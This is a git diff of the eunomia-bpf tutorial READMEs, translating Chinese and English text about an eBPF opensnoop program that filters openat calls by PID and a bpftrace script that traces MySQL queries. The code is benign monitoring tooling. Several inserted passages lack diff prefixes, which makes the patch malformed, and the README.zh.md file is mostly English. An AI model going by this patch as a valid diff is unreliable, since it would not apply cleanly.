+eunomia-bpf is an open-source eBPF dynamic loading runtime and development toolchain combined with Wasm. Its purpose is to simplify the development, building, distribution, and execution of eBPF programs. You can refer to https://github.com/eunomia-bpf/eunomia-bpf to download and install the ecc compilation toolchain and ecli runtime. We will use eunomia-bpf to compile and run this example. The complete code of this example can be found at https://github.com/eunomia-bpf/bpf-developer-tutorial.
 
-编译运行上述代码:
+Compile and run the above code:
 
 ```console
 $ ecc opensnoop.bpf.c
 Compiling bpf object...
 Packing ebpf object and config into package.json...
 $ sudo ecli run package.json
-Runing eBPF program...
+Running eBPF program...
 ```
 
-运行这段程序后,可以通过查看 `/sys/kernel/debug/tracing/trace_pipe` 文件来查看 eBPF 程序的输出:
+After running this program, you can view the output of the eBPF program by viewing the `/sys/kernel/debug/tracing/trace_pipe` file:
 
 ```console
 $ sudo cat /sys/kernel/debug/tracing/trace_pipe
@@ -69,17 +71,17 @@ $ sudo cat /sys/kernel/debug/tracing/trace_pipe
  <...>-3840345 [010] d... 3220702.158000: bpf_trace_printk: Process ID: 3840345 enter sys openat
 ```
 
-此时,我们已经能够捕获进程打开文件的系统调用了。
+At this point, we are able to capture the sys_openat system call for opening files by processes.
 
-## 使用全局变量在 eBPF 中过滤进程 pid
+## Filtering Process PID in eBPF using Global Variables
 
-全局变量在 eBPF 程序中充当一种数据共享机制,它们允许用户态程序与 eBPF 程序之间进行数据交互。这在过滤特定条件或修改 eBPF 程序行为时非常有用。这种设计使得用户态程序能够在运行时动态地控制 eBPF 程序的行为。
+Global variables act as a data sharing mechanism in eBPF programs, allowing data interaction between user space programs and eBPF programs. This is very useful when filtering specific conditions or modifying the behavior of eBPF programs. This design allows user space programs to dynamically control the behavior of eBPF programs at runtime.
 
-在我们的例子中,全局变量 `pid_target` 用于过滤进程 PID。用户态程序可以设置此变量的值,以便在 eBPF 程序中只捕获与指定 PID 相关的 `sys_openat` 系统调用。
+In our example, the global variable `pid_target` is used to filter process PIDs. User space programs can set the value of this variable to capture only the `sys_openat` system calls related to the specified PID in the eBPF program.
 
-使用全局变量的原理是,全局变量在 eBPF 程序的数据段(data section)中定义并存储。当 eBPF 程序加载到内核并执行时,这些全局变量会保持在内核中,可以通过 BPF 系统调用进行访问。用户态程序可以使用 BPF 系统调用中的某些特性,如 `bpf_obj_get_info_by_fd` 和 `bpf_obj_get_info`,获取 eBPF 对象的信息,包括全局变量的位置和值。
+The principle of using global variables is that they are defined and stored in the data section of eBPF programs. When the eBPF program is loaded into the kernel and executed, these global variables are retained in the kernel and can be accessed through BPF system calls. User space programs can use certain features of BPF system calls, such as `bpf_obj_get_info_by_fd` and `bpf_obj_get_info`, to obtain information about the eBPF object, including the position and value of global variables.
 
-可以通过执行 ecli -h 命令来查看 opensnoop 的帮助信息:
+You can view the help information for opensnoop by executing the command `ecli -h`:
 
 ```console
 $ ecli package.json -h
 Usage: opensnoop_bpf [--help] [--version] [--verbose] [--pid_target VAR]
 
 Trace open family syscalls.
@@ -97,27 +99,24 @@ Built with eunomia-bpf framework.
 See https://github.com/eunomia-bpf/eunomia-bpf for more information.
 ```
 
-可以通过 `--pid_target` 选项来指定要捕获的进程的 pid,例如:
+You can specify the PID of the process to capture by using the `--pid_target` option, for example:
 
 ```console
-$ sudo ./ecli run package.json --pid_target 618
-Runing eBPF program...
+$ sudo ./ecli run package.json --pid_target 618
+Running eBPF program...
 ```
 
-运行这段程序后,可以通过查看 `/sys/kernel/debug/tracing/trace_pipe` 文件来查看 eBPF 程序的输出:
+After running this program, you can view the output of the eBPF program by viewing the `/sys/kernel/debug/tracing/trace_pipe` file:
 
 ```console
-$ sudo cat /sys/kernel/debug/tracing/trace_pipe
- <...>-3840345 [010] d... 3220701.101179: bpf_trace_printk: Process ID: 618 enter sys openat
- <...>-3840345 [010] d... 3220702.158000: bpf_trace_printk: Process ID: 618 enter sys openat
+$ sudo cat /sys/kernel/debug/tracing/trace_pipe
+ <...>-3840345 [010] d... 3220701.101179: bpf_trace_printk: Process ID: 618 enter sys openat
+ <...>-3840345 [010] d... 3220702.158000: bpf_trace_printk: Process ID: 618 enter sys openat
 ```
 
-## 总结
+## Summary
 
-本文介绍了如何使用 eBPF 程序来捕获进程打开文件的系统调用。在 eBPF 程序中,我们可以通过定义 `tracepoint__syscalls__sys_enter_open` 和 `tracepoint__syscalls__sys_enter_openat` 函数并使用 `SEC` 宏把它们附加到 sys_enter_open 和 sys_enter_openat 两个 tracepoint 来捕获进程打开文件的系统调用。我们可以使用 `bpf_get_current_pid_tgid` 函数获取调用 open 或 openat 系统调用的进程 ID,并使用 `bpf_printk` 函数在内核日志中打印出来。在 eBPF 程序中,我们还可以通过定义一个全局变量 `pid_target` 来指定要捕获的进程的 pid,从而过滤输出,只输出指定的进程的信息。
+This article introduces how to use eBPF programs to capture the system calls for process file opening. In an eBPF program, we can capture the system calls for process file opening by defining the functions `tracepoint__syscalls__sys_enter_open` and `tracepoint__syscalls__sys_enter_openat` and attaching them to the tracepoints `sys_enter_open` and `sys_enter_openat` using the `SEC` macro. We can use the `bpf_get_current_pid_tgid` function to get the process ID that calls the open or openat system call, and print it out in the kernel log using the `bpf_printk` function. In an eBPF program, we can also filter the output by defining a global variable `pid_target` to specify the pid of the process to be captured, only outputting the information of the specified process.
 
-通过学习本教程,您应该对如何在 eBPF 中捕获和过滤特定进程的系统调用有了更深入的了解。这种方法在系统监控、性能分析和安全审计等场景中具有广泛的应用。
+By learning this tutorial, you should have a deeper understanding of how to capture and filter system calls for specific processes in eBPF. This method has widespread applications in system monitoring, performance analysis, and security auditing.
 
-更多的例子和详细的开发指南,请参考 eunomia-bpf 的官方文档:
-
-如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。
+If you want to learn more about eBPF knowledge and practices, you can visit our tutorial code repository at https://github.com/eunomia-bpf/bpf-developer-tutorial or our website https://eunomia.dev/tutorials/ for more examples and a complete tutorial.
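For comparison, if you build this same program with libbpf and a generated skeleton instead of eunomia-bpf, the global variable is set through the skeleton's `rodata` section before loading. A sketch, assuming the `opensnoop.skel.h` header and `opensnoop_bpf__*` names that `bpftool gen skeleton` would produce for this object:

```c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include "opensnoop.skel.h"   /* assumed: generated by `bpftool gen skeleton` */

int main(int argc, char **argv)
{
    struct opensnoop_bpf *skel = opensnoop_bpf__open();
    if (!skel)
        return 1;
    /* pid_target lives in .rodata (it is const volatile), so it must be
     * written after open() but before load(). */
    if (argc > 1)
        skel->rodata->pid_target = atoi(argv[1]);
    if (opensnoop_bpf__load(skel) || opensnoop_bpf__attach(skel)) {
        opensnoop_bpf__destroy(skel);
        return 1;
    }
    fprintf(stderr, "tracing... read /sys/kernel/debug/tracing/trace_pipe\n");
    for (;;)
        sleep(1);
}
```

This is the same mechanism `--pid_target` uses under the hood: the loader patches the value into the program's read-only data before the kernel verifies and runs it.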
diff --git a/src/4-opensnoop/README.zh.md b/src/4-opensnoop/README.zh.md
new file mode 100644
index 0000000..616488e
--- /dev/null
+++ b/src/4-opensnoop/README.zh.md
@@ -0,0 +1,123 @@
+# eBPF Tutorial by Example 4: Capturing Process Opening Files and Filtering by Process PID with Global Variables
+
+eBPF (Extended Berkeley Packet Filter) is a kernel execution environment that allows users to run secure and efficient programs in the kernel. It is commonly used for network filtering, performance analysis, security monitoring, and other scenarios. The power of eBPF lies in its ability to capture and modify network packets or system calls at runtime in the kernel, enabling monitoring and adjustment of the operating system's behavior.
+
+This article is the fourth part of the eBPF Tutorial by Example, mainly introducing how to capture the collection of system calls used by processes to open files, and how to filter by process PID in eBPF using global variables.
+
+In a Linux system, the interaction between processes and files is achieved through system calls. System calls serve as the interface between user space and kernel space, allowing user programs to request specific operations from the kernel. In this tutorial, we focus on the sys_openat system call, which is used to open files.
+
+When a process opens a file, it issues a sys_openat system call to the kernel and passes relevant parameters (such as the file path and open mode). The kernel handles this request and returns a file descriptor, which serves as a reference for subsequent file operations. By capturing the sys_openat system call, we can understand when and how a process opens a file.
+
+## Capturing the System Calls of Processes Opening Files in eBPF
+
+First, we need to write an eBPF program to capture the system call of a process opening a file. The specific implementation is as follows:
+
+```c
+#include <vmlinux.h>
+#include <bpf/bpf_helpers.h>
+
+/// @description "Process ID to trace"
+const volatile int pid_target = 0;
+
+SEC("tracepoint/syscalls/sys_enter_openat")
+int tracepoint__syscalls__sys_enter_openat(struct trace_event_raw_sys_enter* ctx)
+{
+    u64 id = bpf_get_current_pid_tgid();
+    u32 pid = id >> 32;
+
+    if (pid_target && pid_target != pid)
+        return false;
+    // Use bpf_printk to print the process information
+    bpf_printk("Process ID: %d enter sys openat\n", pid);
+    return 0;
+}
+
+/// "Trace open family syscalls."
+char LICENSE[] SEC("license") = "GPL";
+```
+
+This eBPF program implements the following:
+
+1. Include header files: `<vmlinux.h>` contains the definitions of kernel data structures, and `<bpf/bpf_helpers.h>` contains the helper functions required by eBPF programs.
+2. Define the global variable `pid_target` for filtering a specified process ID. Setting it to 0 captures sys_openat calls from all processes.
+3. Use the `SEC` macro to define an eBPF program associated with the tracepoint "tracepoint/syscalls/sys_enter_openat". This tracepoint is triggered when a process initiates the `sys_openat` system call.
+4. Implement the eBPF program `tracepoint__syscalls__sys_enter_openat`, which takes a parameter `ctx` of type `struct trace_event_raw_sys_enter`. This structure contains information about the system call.
+5. Use the `bpf_get_current_pid_tgid()` function to retrieve the PID and TID (thread ID) of the current process. Since we only care about the PID, we shift its value 32 bits to the right and assign it to the variable `pid` of type `u32`.
+6. Check whether the `pid_target` variable is equal to the current process's PID. If `pid_target` is not 0 and is not equal to the current process's PID, return `false` and skip capturing the `sys_openat` call of that process.
+7. Use the `bpf_printk()` function to print the captured process ID and relevant information about the `sys_openat` call. This information can be viewed in user space using BPF tools.
+8. Set the program license to "GPL", which is a necessary condition for running eBPF programs.
+
+This eBPF program can be loaded into the kernel and executed using tools like libbpf or eunomia-bpf. It captures the sys_openat system call of the specified process (or all processes) and outputs relevant information in user space.
+
+eunomia-bpf is an open-source eBPF dynamic loading runtime and development toolchain combined with Wasm. Its purpose is to simplify the development, building, distribution, and execution of eBPF programs. You can refer to https://github.com/eunomia-bpf/eunomia-bpf to download and install the ecc compilation toolchain and ecli runtime. We use eunomia-bpf to compile and run this example; the complete code is available at https://github.com/eunomia-bpf/bpf-developer-tutorial.
+
+Compile and run the above code:
+
+```console
+$ ecc opensnoop.bpf.c
+Compiling bpf object...
+Packing ebpf object and config into package.json...
+$ sudo ecli run package.json
+Running eBPF program...
+```
+
+After running this program, you can view the output of the eBPF program by reading the `/sys/kernel/debug/tracing/trace_pipe` file:
+
+```console
+$ sudo cat /sys/kernel/debug/tracing/trace_pipe
+ <...>-3840345 [010] d... 3220701.101179: bpf_trace_printk: Process ID: 3840345 enter sys openat
+ <...>-3840345 [010] d... 3220702.158000: bpf_trace_printk: Process ID: 3840345 enter sys openat
+```
+
+At this point, we are able to capture the system calls of processes opening files.
+
+## Filtering by Process PID in eBPF Using Global Variables
+
+Global variables act as a data-sharing mechanism in eBPF programs, allowing user space programs to exchange data with eBPF programs. This is very useful for filtering on specific conditions or modifying the behavior of eBPF programs. This design allows user space programs to dynamically control the behavior of eBPF programs at runtime.
+
+In our example, the global variable `pid_target` is used to filter process PIDs. User space programs can set the value of this variable so that the eBPF program only captures the `sys_openat` system calls related to the specified PID.
+
+The principle behind global variables is that they are defined and stored in the data section of the eBPF program. When the eBPF program is loaded into the kernel and executed, these global variables are kept in the kernel and can be accessed through BPF system calls. User space programs can use certain features of the BPF system call, such as `bpf_obj_get_info_by_fd` and `bpf_obj_get_info`, to obtain information about the eBPF object, including the position and value of global variables.
+
+You can view the help information for opensnoop by executing the command `ecli -h`:
+
+```console
+$ ecli package.json -h
+Usage: opensnoop_bpf [--help] [--version] [--verbose] [--pid_target VAR]
+
+Trace open family syscalls.
+ +Optional arguments: + -h, --help shows help message and exits + -v, --version prints version information and exits + --verbose prints libbpf debug information + --pid_target Process ID to trace + +Built with eunomia-bpf framework. +See https://github.com/eunomia-bpf/eunomia-bpf for more information. +``` + +可以通过 `--pid_target` 选项来指定要捕获的进程的 pid,例如: + +```console +$ sudo ./ecli run package.json --pid_target 618 +Runing eBPF program... +``` + +运行这段程序后,可以通过查看 `/sys/kernel/debug/tracing/trace_pipe` 文件来查看 eBPF 程序的输出: + +```console +$ sudo cat /sys/kernel/debug/tracing/trace_pipe + <...>-3840345 [010] d... 3220701.101179: bpf_trace_printk: Process ID: 618 enter sys openat + <...>-3840345 [010] d... 3220702.158000: bpf_trace_printk: Process ID: 618 enter sys openat +``` + +## 总结 + +本文介绍了如何使用 eBPF 程序来捕获进程打开文件的系统调用。在 eBPF 程序中,我们可以通过定义 `tracepoint__syscalls__sys_enter_open` 和 `tracepoint__syscalls__sys_enter_openat` 函数并使用 `SEC` 宏把它们附加到 sys_enter_open 和 sys_enter_openat 两个 tracepoint 来捕获进程打开文件的系统调用。我们可以使用 `bpf_get_current_pid_tgid` 函数获取调用 open 或 openat 系统调用的进程 ID,并使用 `bpf_printk` 函数在内核日志中打印出来。在 eBPF 程序中,我们还可以通过定义一个全局变量 `pid_target` 来指定要捕获的进程的 pid,从而过滤输出,只输出指定的进程的信息。 + +通过学习本教程,您应该对如何在 eBPF 中捕获和过滤特定进程的系统调用有了更深入的了解。这种方法在系统监控、性能分析和安全审计等场景中具有广泛的应用。 + +更多的例子和详细的开发指南,请参考 eunomia-bpf 的官方文档: + +如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 diff --git a/src/4-opensnoop/README_en.md b/src/4-opensnoop/README_en.md deleted file mode 100644 index c2648cf..0000000 --- a/src/4-opensnoop/README_en.md +++ /dev/null @@ -1,122 +0,0 @@ -# eBPF Tutorial by Example 4: Capturing Opening Files and Filter with Global Variables - -eBPF (Extended Berkeley Packet Filter) is a kernel execution environment that allows users to run secure and efficient programs in the kernel. It is commonly used for network filtering, performance analysis, security monitoring, and other scenarios. The power of eBPF lies in its ability to capture and modify network packets or system calls at runtime in the kernel, enabling monitoring and adjustment of the operating system's behavior. - -This article is the fourth part of the eBPF Tutorial by Example, mainly focusing on how to capture the system call collection of process opening files and filtering process PIDs using global variables in eBPF. - -In Linux system, the interaction between processes and files is achieved through system calls. System calls serve as the interface between user space programs and kernel space programs, allowing user programs to request specific operations from the kernel. In this tutorial, we focus on the sys_openat system call, which is used to open files. - -When a process opens a file, it issues a sys_openat system call to the kernel and passes relevant parameters (such as file path, open mode, etc.). The kernel handles this request and returns a file descriptor, which serves as a reference for subsequent file operations. By capturing the sys_openat system call, we can understand when and how a process opens a file. - -## Capturing the System Call Collection of Process Opening Files in eBPF - -First, we need to write an eBPF program to capture the system call of a process opening a file. 
The specific implementation is as follows:
-
-```c
-#include <vmlinux.h>
-#include <bpf/bpf_helpers.h>
-
-/// @description "Process ID to trace"
-const volatile int pid_target = 0;
-
-SEC("tracepoint/syscalls/sys_enter_openat")
-int tracepoint__syscalls__sys_enter_openat(struct trace_event_raw_sys_enter* ctx)
-{
-    u64 id = bpf_get_current_pid_tgid();
-    u32 pid = id >> 32;
-
-    if (pid_target && pid_target != pid)
-        return false;
-
-    // Use bpf_printk to print the process information
-    bpf_printk("Process ID: %d enter sys openat\n", pid);
-    return 0;
-}
-
-/// "Trace open family syscalls."
-char LICENSE[] SEC("license") = "GPL";
-```
-
-This eBPF program implements the following:
-
-1. Include header files: `<vmlinux.h>` contains the definitions of kernel data structures, and `<bpf/bpf_helpers.h>` contains the helper functions required by eBPF programs.
-2. Define the global variable `pid_target` for filtering a specified process ID. Setting it to 0 captures sys_openat calls from all processes.
-3. Use the `SEC` macro to define an eBPF program associated with the tracepoint "tracepoint/syscalls/sys_enter_openat". This tracepoint is triggered when a process initiates the `sys_openat` system call.
-4. Implement the eBPF program `tracepoint__syscalls__sys_enter_openat`, which takes a parameter `ctx` of type `struct trace_event_raw_sys_enter`. This structure contains information about the system call.
-5. Use the `bpf_get_current_pid_tgid()` function to retrieve the PID and TID (Thread ID) of the current process. Since we only care about the PID, we shift its value 32 bits to the right and assign it to the variable `pid` of type `u32`.
-6. Check if the `pid_target` variable is equal to the current process's PID. If `pid_target` is not 0 and is not equal to the current process's PID, return `false` to skip capturing the `sys_openat` call of that process.
-7. Use the `bpf_printk()` function to print the captured process ID and relevant information about the `sys_openat` call. This information can be viewed in user space using BPF tools.
-8. Set the program license to "GPL", which is a necessary condition for running eBPF programs.
-
-This eBPF program can be loaded into the kernel and executed using tools like libbpf or eunomia-bpf. It captures the sys_openat system call of the specified process (or all processes) and outputs relevant information in user space.
-
-eunomia-bpf is an open-source eBPF dynamic loading runtime and development toolchain combined with Wasm. Its purpose is to simplify the development, building, distribution, and execution of eBPF programs. You can refer to to download and install the ecc compilation toolchain and ecli runtime. We will use eunomia-bpf to compile and run this example. The complete code of this example can be found at .
-
-Compile and run the above code:
-
-```console
-$ ecc opensnoop.bpf.c
-Compiling bpf object...
-Packing ebpf object and config into package.json...
-$ sudo ecli run package.json
-Running eBPF program...
-```
-
-After running this program, you can view the output of the eBPF program in the `/sys/kernel/debug/tracing/trace_pipe` file:
-
-```console
-$ sudo cat /sys/kernel/debug/tracing/trace_pipe
- <...>-3840345 [010] d... 3220701.101179: bpf_trace_printk: Process ID: 3840345 enter sys openat
- <...>-3840345 [010] d... 3220702.158000: bpf_trace_printk: Process ID: 3840345 enter sys openat
-```
-
-At this point, we are able to capture the sys_openat system call for opening files by processes.
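Note that the summary of this article mentions attaching to both `sys_enter_open` and `sys_enter_openat`, while the listing above only handles `openat`. A companion handler for the legacy `open(2)` entry point is a one-tracepoint addition; the sketch below simply mirrors the existing program body and is not part of the original listing:

```c
// Companion handler sketch for the legacy open(2) syscall; programs that
// still call open() directly would be missed by the openat-only version.
SEC("tracepoint/syscalls/sys_enter_open")
int tracepoint__syscalls__sys_enter_open(struct trace_event_raw_sys_enter* ctx)
{
    u64 id = bpf_get_current_pid_tgid();
    u32 pid = id >> 32;

    if (pid_target && pid_target != pid)
        return false;
    bpf_printk("Process ID: %d enter sys open\n", pid);
    return 0;
}
```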
-
-## Filtering Process PID in eBPF using Global Variables
-
-Global variables act as a data sharing mechanism in eBPF programs, allowing data interaction between user space programs and eBPF programs. This is very useful when filtering on specific conditions or modifying the behavior of eBPF programs. This design allows user space programs to dynamically control the behavior of eBPF programs at runtime.
-
-In our example, the global variable `pid_target` is used to filter process PIDs. User space programs can set the value of this variable to capture only the `sys_openat` system calls related to the specified PID in the eBPF program.
-
-The principle of using global variables is that they are defined and stored in the data section of eBPF programs. When the eBPF program is loaded into the kernel and executed, these global variables are retained in the kernel and can be accessed through BPF system calls. User space programs can use certain features of BPF system calls, such as `bpf_obj_get_info_by_fd` and `bpf_obj_get_info`, to obtain information about the eBPF object, including the position and value of global variables.
-
-You can view the help information for opensnoop by executing the command `ecli package.json -h`:
-
-```console
-$ ecli package.json -h
-Usage: opensnoop_bpf [--help] [--version] [--verbose] [--pid_target VAR]
-
-Trace open family syscalls.
-
-Optional arguments:
-  -h, --help    shows help message and exits
-  -v, --version prints version information and exits
-  --verbose     prints libbpf debug information
-  --pid_target  Process ID to trace
-
-Built with eunomia-bpf framework.
-See https://github.com/eunomia-bpf/eunomia-bpf for more information.
-```
-
-You can specify the PID of the process to capture by using the `--pid_target` option, for example:
-
-```console
-$ sudo ./ecli run package.json --pid_target 618
-Running eBPF program...
-```
-
-After running this program, you can view the output of the eBPF program in the `/sys/kernel/debug/tracing/trace_pipe` file:
-
-```console
-$ sudo cat /sys/kernel/debug/tracing/trace_pipe
- <...>-3840345 [010] d... 3220701.101179: bpf_trace_printk: Process ID: 618 enter sys openat
- <...>-3840345 [010] d... 3220702.158000: bpf_trace_printk: Process ID: 618 enter sys openat
-```
-
-## Summary
-
-This article introduces how to use eBPF programs to capture the system calls a process makes to open files. In an eBPF program, we capture these calls by defining the functions `tracepoint__syscalls__sys_enter_open` and `tracepoint__syscalls__sys_enter_openat` and attaching them to the tracepoints `sys_enter_open` and `sys_enter_openat` using the `SEC` macro. We can use the `bpf_get_current_pid_tgid` function to get the ID of the process that calls the open or openat system call, and print it out in the kernel log using the `bpf_printk` function. We can also filter the output by defining a global variable `pid_target` to specify the pid of the process to be captured, so that only information about the specified process is output.
-
-By working through this tutorial, you should have a deeper understanding of how to capture and filter system calls of specific processes in eBPF. This method has widespread applications in system monitoring, performance analysis, and security auditing.
-
-If you want to learn more about eBPF and its practical applications, you can visit our tutorial code repository at or our website for more examples and complete tutorials.
diff --git a/src/40-mysql/README.md b/src/40-mysql/README.md index 7aa3486..6506ee5 100644 --- a/src/40-mysql/README.md +++ b/src/40-mysql/README.md @@ -1,82 +1,82 @@ -# 使用 eBPF 跟踪 MySQL 查询 +# Using eBPF to Trace MySQL Queries -MySQL 是全球最广泛使用的关系型数据库管理系统之一。无论您是在运行小型应用程序还是大型企业系统,了解 MySQL 数据库的性能特征都至关重要。特别是了解 SQL 查询的执行时间以及哪些查询占用了最多的时间,有助于诊断性能问题,并优化数据库以提高效率。 +MySQL is one of the most widely used relational database management systems in the world. Whether you are running a small application or a large-scale enterprise system, understanding the performance characteristics of your MySQL database can be crucial. In particular, knowing how long SQL queries take to execute and which queries are consuming the most time can help in diagnosing performance issues and optimizing your database for better efficiency. -在这种情况下,eBPF(扩展的伯克利包过滤器)可以派上用场。eBPF 是一项强大的技术,它允许您编写程序并在 Linux 内核中运行,帮助您跟踪、监控和分析系统行为的各个方面,包括 MySQL 这类应用程序的性能。在本文中,我们将探讨如何使用 eBPF 跟踪 MySQL 查询,测量其执行时间,并深入了解数据库的性能表现。 +This is where eBPF (Extended Berkeley Packet Filter) comes into play. eBPF is a powerful technology that allows you to write programs that can run in the Linux kernel, enabling you to trace, monitor, and analyze various aspects of system behavior, including the performance of applications like MySQL. In this blog, we'll explore how to use eBPF to trace MySQL queries, measure their execution time, and gain valuable insights into your database's performance. -## 背景:MySQL 和 eBPF +## Background: MySQL and eBPF ### MySQL -MySQL 是一种关系型数据库管理系统(RDBMS),使用结构化查询语言(SQL)来管理和查询数据。它广泛应用于各种场景,从 Web 应用程序到数据仓库。MySQL 的性能对应用程序的整体性能至关重要,尤其是在处理大数据集或复杂查询时。 +MySQL is a relational database management system (RDBMS) that uses Structured Query Language (SQL) to manage and query data. It is widely used for a variety of applications, from web applications to data warehousing. MySQL's performance can be critical to the overall performance of your application, especially when dealing with large datasets or complex queries. ### eBPF -eBPF 是一项允许在 Linux 内核中执行自定义程序的技术,而无需修改内核源代码或加载内核模块。eBPF 最初是为网络数据包过滤而设计的,但现在已经发展为一个多用途的工具,可用于性能监控、安全和调试。eBPF 程序可以附加到各种内核和用户空间事件上,使得我们能够跟踪函数、系统调用等的执行。 +eBPF is a technology that allows for the execution of custom programs in the Linux kernel without the need to modify the kernel source code or load kernel modules. Initially designed for network packet filtering, eBPF has evolved into a versatile tool for performance monitoring, security, and debugging. eBPF programs can be attached to various kernel and user-space events, making it possible to trace the execution of functions, system calls, and more. -使用 eBPF,我们可以跟踪 MySQL 的某些函数,例如负责处理 SQL 查询的 `dispatch_command` 函数。通过跟踪该函数,我们可以捕获查询执行的开始和结束时间,测量延迟,并记录执行的查询。 +Using eBPF, we can trace the execution of MySQL functions, such as `dispatch_command`, which is responsible for handling SQL queries. By tracing this function, we can capture the start and end times of query execution, measure the latency, and log the executed queries. -## MySQL 查询 +## Tracing MySQL Queries with eBPF -要使用 eBPF 跟踪 MySQL 查询,我们可以编写一个使用 `bpftrace` 的脚本,`bpftrace` 是一种 eBPF 的高级跟踪语言。以下是一个跟踪 MySQL 中 `dispatch_command` 函数的脚本,用于记录执行的查询并测量其执行时间: +To trace MySQL queries using eBPF, we can write a script using `bpftrace`, a high-level tracing language for eBPF. 
Below is a script that traces the `dispatch_command` function in MySQL to log executed queries and measure their execution time: ```bt #!/usr/bin/env bpftrace -// 跟踪 MySQL 中的 dispatch_command 函数 +// Trace the dispatch_command function in MySQL uprobe:/usr/sbin/mysqld:dispatch_command { - // 将命令执行的开始时间存储在 map 中 + // Store the start time of the command execution in the map @start_times[tid] = nsecs; - // 打印进程 ID 和命令字符串 + // Print the process ID and command string printf("MySQL command executed by PID %d: ", pid); - // dispatch_command 的第三个参数是 SQL 查询字符串 + // The third argument to dispatch_command is the SQL query string printf("%s\n", str(arg3)); } uretprobe:/usr/sbin/mysqld:dispatch_command { - // 从 map 中获取开始时间 + // Retrieve the start time from the map $start = @start_times[tid]; - // 计算延迟,以毫秒为单位 + // Calculate the latency in milliseconds $delta = (nsecs - $start) / 1000000; - // 打印延迟 + // Print the latency printf("Latency: %u ms\n", $delta); - // 从 map 中删除条目以避免内存泄漏 + // Delete the entry from the map to avoid memory leaks delete(@start_times[tid]); } ``` -### 脚本解释 +### Explanation of the Script -1. **跟踪 `dispatch_command` 函数**: - - 该脚本在 MySQL 中的 `dispatch_command` 函数上附加了一个 `uprobe`。该函数在 MySQL 需要执行 SQL 查询时调用。`Uprobe` 在内核模式 eBPF 运行时中可能会导致较大的性能开销。在这种情况下,您可以考虑使用用户模式 eBPF 运行时,例如 [bpftime](https://github.com/eunomia-bpf/bpftime)。 - - `uprobe` 捕获函数执行的开始时间并记录正在执行的 SQL 查询。 +1. **Tracing the `dispatch_command` Function**: + - The script attaches an `uprobe` to the `dispatch_command` function in MySQL. This function is called whenever MySQL needs to execute a SQL query. `Uprobe` in kernel mode eBPF runtime may also cause relatively large performance overhead. In this case, you can also consider using user mode eBPF runtime, such as [bpftime](https://github.com/eunomia-bpf/bpftime). + - The `uprobe` captures the start time of the function execution and logs the SQL query being executed. -2. **计算和记录延迟**: - - 一个相应的 `uretprobe` 附加到 `dispatch_command` 函数。`uretprobe` 在函数返回时触发,允许我们计算查询的总执行时间(延迟)。 - - 延迟以毫秒为单位计算并打印到控制台。 +2. **Calculating and Logging Latency**: + - A corresponding `uretprobe` is attached to the `dispatch_command` function. The `uretprobe` triggers when the function returns, allowing us to calculate the total execution time (latency) of the query. + - The latency is calculated in milliseconds and printed to the console. -3. **使用 Map 管理状态**: - - 脚本使用一个 BPF map 来存储每个查询的开始时间,并以线程 ID (`tid`) 作为键。这使我们能够匹配每次查询执行的开始和结束时间。 - - 在计算延迟后,从 map 中删除条目以避免内存泄漏。 +3. **Managing State with Maps**: + - The script uses a BPF map to store the start times of each query, keyed by the thread ID (`tid`). This allows us to match the start and end of each query execution. + - After calculating the latency, the entry is removed from the map to avoid memory leaks. 
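For readers who prefer compiled eBPF over `bpftrace`, the same enter/exit timing can be expressed as a libbpf CO-RE program. The sketch below is a rough equivalent under stated assumptions: it relies on libbpf's uprobe auto-attach section names (libbpf 0.8 or newer), assumes `mysqld` lives at `/usr/sbin/mysqld`, and assumes `dispatch_command` is resolvable under that name; since mysqld is a C++ binary, you may in practice need the mangled symbol or a function offset:

```c
// trace_mysql.bpf.c -- hypothetical libbpf counterpart of the bpftrace
// script above: a hash map keyed by thread id replaces @start_times.
#include "vmlinux.h"
#include <bpf/bpf_helpers.h>

struct {
    __uint(type, BPF_MAP_TYPE_HASH);
    __uint(max_entries, 10240);
    __type(key, u32);   /* thread id */
    __type(value, u64); /* entry timestamp, ns */
} start_times SEC(".maps");

SEC("uprobe//usr/sbin/mysqld:dispatch_command")
int dispatch_command_enter(struct pt_regs *ctx)
{
    u32 tid = (u32)bpf_get_current_pid_tgid();
    u64 ts = bpf_ktime_get_ns();

    /* Record when this thread entered dispatch_command. */
    bpf_map_update_elem(&start_times, &tid, &ts, BPF_ANY);
    return 0;
}

SEC("uretprobe//usr/sbin/mysqld:dispatch_command")
int dispatch_command_exit(struct pt_regs *ctx)
{
    u32 tid = (u32)bpf_get_current_pid_tgid();
    u64 *start = bpf_map_lookup_elem(&start_times, &tid);

    if (!start)
        return 0;
    /* Latency in milliseconds, mirroring the bpftrace version. */
    bpf_printk("dispatch_command latency: %llu ms",
               (bpf_ktime_get_ns() - *start) / 1000000);
    bpf_map_delete_elem(&start_times, &tid);
    return 0;
}

char LICENSE[] SEC("license") = "GPL";
```

Compared with the bpftrace one-liner, this version trades convenience for lower per-event overhead and a self-contained binary that can be shipped without the bpftrace toolchain.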
-## 运行脚本 +## Running the Script -要运行此脚本,只需将其保存为文件(例如 `trace_mysql.bt`),然后使用 `bpftrace` 执行它: +To run this script, simply save it to a file (e.g., `trace_mysql.bt`), and then execute it using `bpftrace`: ```bash sudo bpftrace trace_mysql.bt ``` -### 输出示例 +### Sample Output -脚本运行后,它将打印 MySQL 执行的每个 SQL 查询的信息,包括进程 ID、查询内容以及延迟时间: +Once the script is running, it will print information about each SQL query executed by MySQL, including the process ID, the query itself, and the latency: ```console MySQL command executed by PID 1234: SELECT * FROM users WHERE id = 1; @@ -87,19 +87,19 @@ MySQL command executed by PID 1234: INSERT INTO orders (user_id, product_id) VAL Latency: 42 ms ``` -这个输出显示了正在执行的 SQL 命令以及每个命令的执行时间,为您提供了关于 MySQL 查询性能的宝贵见解。 +This output shows the SQL commands being executed and how long each one took, providing valuable insights into the performance of your MySQL queries. -## 跟踪 MySQL 查询可以带来什么收获? +## What Can We Learn from Tracing MySQL? -通过使用 eBPF 跟踪 MySQL 查询,您可以获得以下几点收获: +By tracing MySQL queries with eBPF, you can gain several insights: -- **识别慢查询**:您可以快速识别哪些 SQL 查询执行时间最长。这对于性能调优以及优化数据库模式或索引策略至关重要。 -- **监控数据库性能**:定期监控查询的延迟,确保您的 MySQL 数据库在不同工作负载下保持最佳性能。 -- **调试和故障排除**:在面对性能问题时,这种跟踪方法可以帮助您准确定位导致延迟的查询,从而更容易调试和解决问题。 -- **容量规划**:通过了解各种查询的延迟,您可以更好地进行容量规划,确保您的 